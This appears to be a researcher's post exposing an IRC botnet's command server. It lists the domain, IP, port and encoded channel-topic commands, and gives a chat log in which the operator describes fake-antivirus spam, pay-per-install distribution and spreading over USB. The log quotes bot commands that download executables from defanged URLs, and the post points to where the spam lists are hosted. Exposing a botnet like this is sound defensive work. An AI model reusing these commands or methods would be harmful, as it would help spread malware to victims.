Resolved w4hw5wg3488h.net to 213.165.89.117
Server: w4hw5wg3488h.net
Port: 5050
Channel: #oh
Topic for #oh is: .d /100/97/111/124/120/46/47/39/99/103/96/69/126/115/101/62/113/111/115/62/100/124/57/61/39/57/60/23/40/61/47/33/12/63/52/35/42/41/17/103/8/85/63/104/127/118/39/98/107/73/77/
Topic for #oh set by s at Sat Dec 01 18:36:05 2012
Oper: s!x@x
Talking with snk
<Userbased> hey <s> sup <Userbased> cool ircd mod <s> yea <Userbased> I like the link encryption as well <Userbased> is this an asper mod? <s> yea <Userbased> is the spam built into the bot? <Userbased> .s.on /100/97/111/124/49/59/47/127/124/127/58/64/127/122/102/114/119/114/112/112/114/116/101/34/124/103/104/10/115/103/52/117/91/109/ /100/97/111/124/49/59/47/127/124/127/58/64/127/122/102/114/119/114/112/112/114/116/101/34/124/103/104/10/ 204 f9555c <Userbased> like that? <s> no <Userbased> oh <Userbased> that would have been cool <s> how u found that ip <Userbased> how does being a zero access affilate work? I've never seen it check into a stats url <Userbased> threatexpert <s> its good with US installs <s> how u know it was spam <s> have u checked it out? <Userbased> That was an old one. I found the exe for that <Userbased> ran it and saw it look up MX records <s> :) <Userbased> is it your mail or sending for others? <s> mine <Userbased> I hear email still gives a good spread <s> im not using it for spread <s> i spam fakeav <Userbased> Why not spam the bot then load the fakeav? <Userbased> You could load other crap as well <s> on US ; GB etc av loaded, on EU ppc <s> and other ppi <s> php script <Userbased> ah, so it's a link, not a zip <Userbased> makes sense <s> its zip <Userbased> but the link gives the zip right, it's not attached <s> with downloader <s> it goes to php script <s> and php script gives the right exe <Userbased> yes <Userbased> same as with skype <s> on skype not need to spread zip <s> are u the guy from trojanforge? <Userbased> you on there? <Userbased> lol <s> yes <Userbased> why ngr with skype but this for here? <s> i never used ngrbot <Userbased> hmm <s> i dont have anything todo with their ngrbot and skypespread <s> im working alone <Userbased> ok <Userbased> you are snk right? <Userbased> or do I have you mixed up? <s> yes im snk <Userbased> I see a snk on that server. They just stealing your name? <s> yes <Userbased> lame <Userbased> so how do you spread? just spam? <s> usb <s> whats their server with snk inside? <Userbased> http://www.exposedbotnets.com/2012/10/venustimeinfopl-ngrbot-irc-botnet.html <Userbased> get.my.front sets mode +q #load snk <Userbased> Oct 28 14:53:28 <snk> !dl hxxp://hotfile.com/dl/177749006/d16b55a/23y9bf927gfh.html <s> hehehe funny guys :) <Userbased> yes <Userbased> Oct 28 15:03:24 * Received a CTCP TIME from snk (to #load) <Userbased> Oct 28 15:03:28 * Received a CTCP VERSION from snk (to #load) <Userbased> Oct 28 15:15:57 * Disconnected (Remote host closed socket). <s> u have bots too? <Userbased> too lazy to keep up with crypts and servers <s> ok <s> i lost whole net some days ago cos of spamhaus <s> need to start again <Userbased> java!java@team PRIVMSG n[USA|XP]2144220 :.dl hxxp://031919c.netsolhost.com/4531545.exe Nov 05 21:12:02 * test (java@team) has left #load <Userbased> no backup dns? <s> no <s> do u know fubar? <Userbased> ngrbot coder? <s> yes <s> its aspermod too <Userbased> So I hear <Userbased> Lots of stuff seems to use the asper base <Userbased> how did you choose the domain, just pound on the keyboard> <Userbased> ? <s> yes <Userbased> why do you always host with 1&1? are they cheap and slow to takedown or something? <s> idk <s> i just bought them
Hosting infos: http://whois.domaintools.com/213.165.89.117
EDIT:
now he’s spamming again
Topic for #lol is: .s.on /100/97/111/124/49/59/47/127/124/127/58/64/127/122/102/114/119/114/112/112/114/116/101/34/124/103/104/10/115/103/52/117/91/109/ /100/97/111/124/49/59/47/127/124/127/58/64/127/122/102/114/119/114/112/112/114/116/101/34/124/103/104/10/ 327 y7f6x
Topic for #lol set by postman at Sat Dec 01 23:53:40 2012
His email lists are at http://www.chefbernards.com/ as 1 to 327.txt